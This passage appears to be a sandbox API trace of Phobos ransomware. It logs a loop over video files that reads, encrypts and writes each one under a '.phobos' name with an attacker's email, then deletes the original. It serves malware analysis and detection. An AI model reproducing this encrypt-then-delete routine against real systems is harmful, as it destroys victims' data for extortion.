lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=66439) returned 1 [0199.485] CloseHandle (hObject=0x16c) returned 1 [0199.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qqsa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qqsa.avi")) returned 0x20 [0199.485] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qqsa.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qqsa.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qqsa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qqsa.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.486] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.486] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.486] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qqsa.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qqsa.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.487] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.487] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.487] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x10387, lpOverlapped=0x0) returned 1 [0199.492] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10390, dwBufLen=0x10390 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x10390) returned 1 [0199.492] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x10390, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x10390, lpOverlapped=0x0) returned 1 [0199.494] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0199.494] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.494] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0199.494] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.494] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0199.495] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.495] CloseHandle (hObject=0x16c) returned 1 [0199.495] CloseHandle (hObject=0x178) returned 1 [0199.495] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\qqsa.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\qqsa.avi")) returned 1 [0199.496] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\ud10SMBJz 5ZimP.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\ud10smbjz 5zimp.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.497] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=95763) returned 1 [0199.497] CloseHandle (hObject=0x178) returned 1 [0199.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\ud10SMBJz 5ZimP.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\ud10smbjz 5zimp.swf")) returned 0x20 [0199.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\ud10SMBJz 5ZimP.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\ud10smbjz 5zimp.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\ud10SMBJz 5ZimP.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\ud10smbjz 5zimp.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.497] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.497] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\ud10SMBJz 5ZimP.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\ud10smbjz 5zimp.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.509] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.509] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.509] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x17613, lpOverlapped=0x0) returned 1 [0199.525] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17620, dwBufLen=0x17620 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x17620) returned 1 [0199.525] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x17620, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x17620, lpOverlapped=0x0) returned 1 [0199.527] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32b68) returned 1 [0199.527] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.527] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.527] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.527] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.527] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.527] CloseHandle (hObject=0x178) returned 1 [0199.527] CloseHandle (hObject=0x16c) returned 1 [0199.528] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\ud10SMBJz 5ZimP.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\ud10smbjz 5zimp.swf")) returned 1 [0199.529] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.529] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wIBPYsvBS_c7Mj3o-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wibpysvbs_c7mj3o-.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.530] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=62164) returned 1 [0199.530] CloseHandle (hObject=0x16c) returned 1 [0199.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wIBPYsvBS_c7Mj3o-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wibpysvbs_c7mj3o-.mkv")) returned 0x20 [0199.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wIBPYsvBS_c7Mj3o-.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wibpysvbs_c7mj3o-.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wIBPYsvBS_c7Mj3o-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wibpysvbs_c7mj3o-.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.530] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.530] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wIBPYsvBS_c7Mj3o-.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wibpysvbs_c7mj3o-.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.533] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.533] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.533] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xf2d4, lpOverlapped=0x0) returned 1 [0199.555] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf2e0, dwBufLen=0xf2e0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf2e0) returned 1 [0199.556] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2e0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2e0, lpOverlapped=0x0) returned 1 [0199.558] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa329e8) returned 1 [0199.558] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.558] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.558] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.558] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.558] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.558] CloseHandle (hObject=0x16c) returned 1 [0199.558] CloseHandle (hObject=0x178) returned 1 [0199.558] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wIBPYsvBS_c7Mj3o-.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wibpysvbs_c7mj3o-.mkv")) returned 1 [0199.559] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wnWyQMdd8DFEd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wnwyqmdd8dfed.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.560] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=85807) returned 1 [0199.560] CloseHandle (hObject=0x178) returned 1 [0199.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wnWyQMdd8DFEd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wnwyqmdd8dfed.swf")) returned 0x20 [0199.560] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wnWyQMdd8DFEd.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wnwyqmdd8dfed.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wnWyQMdd8DFEd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wnwyqmdd8dfed.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.560] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.560] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wnWyQMdd8DFEd.swf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wnwyqmdd8dfed.swf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.561] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.561] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.561] ReadFile (in: hFile=0x178, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x14f2f, lpOverlapped=0x0) returned 1 [0199.723] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x14f30, dwBufLen=0x14f30 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x14f30) returned 1 [0199.724] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x14f30, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x14f30, lpOverlapped=0x0) returned 1 [0199.725] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0199.725] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.726] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.726] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.726] WriteFile (in: hFile=0x16c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.726] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.726] CloseHandle (hObject=0x178) returned 1 [0199.726] CloseHandle (hObject=0x16c) returned 1 [0199.726] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cE4b_\\wnWyQMdd8DFEd.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ce4b_\\wnwyqmdd8dfed.swf")) returned 1 [0199.727] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HSVoLPibhtakIa.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hsvolpibhtakia.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.728] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=70389) returned 1 [0199.728] CloseHandle (hObject=0x16c) returned 1 [0199.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HSVoLPibhtakIa.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hsvolpibhtakia.mp4")) returned 0x20 [0199.729] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HSVoLPibhtakIa.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hsvolpibhtakia.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HSVoLPibhtakIa.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hsvolpibhtakia.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.729] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.729] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HSVoLPibhtakIa.mp4.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hsvolpibhtakia.mp4.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.730] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0199.730] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.730] ReadFile (in: hFile=0x16c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x112f5, lpOverlapped=0x0) returned 1 [0199.732] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x11300, dwBufLen=0x11300 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x11300) returned 1 [0199.732] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x11300, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x11300, lpOverlapped=0x0) returned 1 [0199.734] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32aa8) returned 1 [0199.734] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0199.734] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50, dwBufLen=0x50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x50) returned 1 [0199.734] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.734] WriteFile (in: hFile=0x178, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x102, lpOverlapped=0x0) returned 1 [0199.734] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.734] CloseHandle (hObject=0x16c) returned 1 [0199.734] CloseHandle (hObject=0x178) returned 1 [0199.734] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HSVoLPibhtakIa.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hsvolpibhtakia.mp4")) returned 1 [0199.735] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0199.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ITCckmiJch.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\itcckmijch.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.736] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=73857) returned 1 [0199.736] CloseHandle (hObject=0x178) returned 1 [0199.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ITCckmiJch.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\itcckmijch.avi")) returned 0x20 [0199.736] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ITCckmiJch.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\itcckmijch.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\ITCckmiJch.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\itcckmijch.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.737] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.737] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0199.737] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 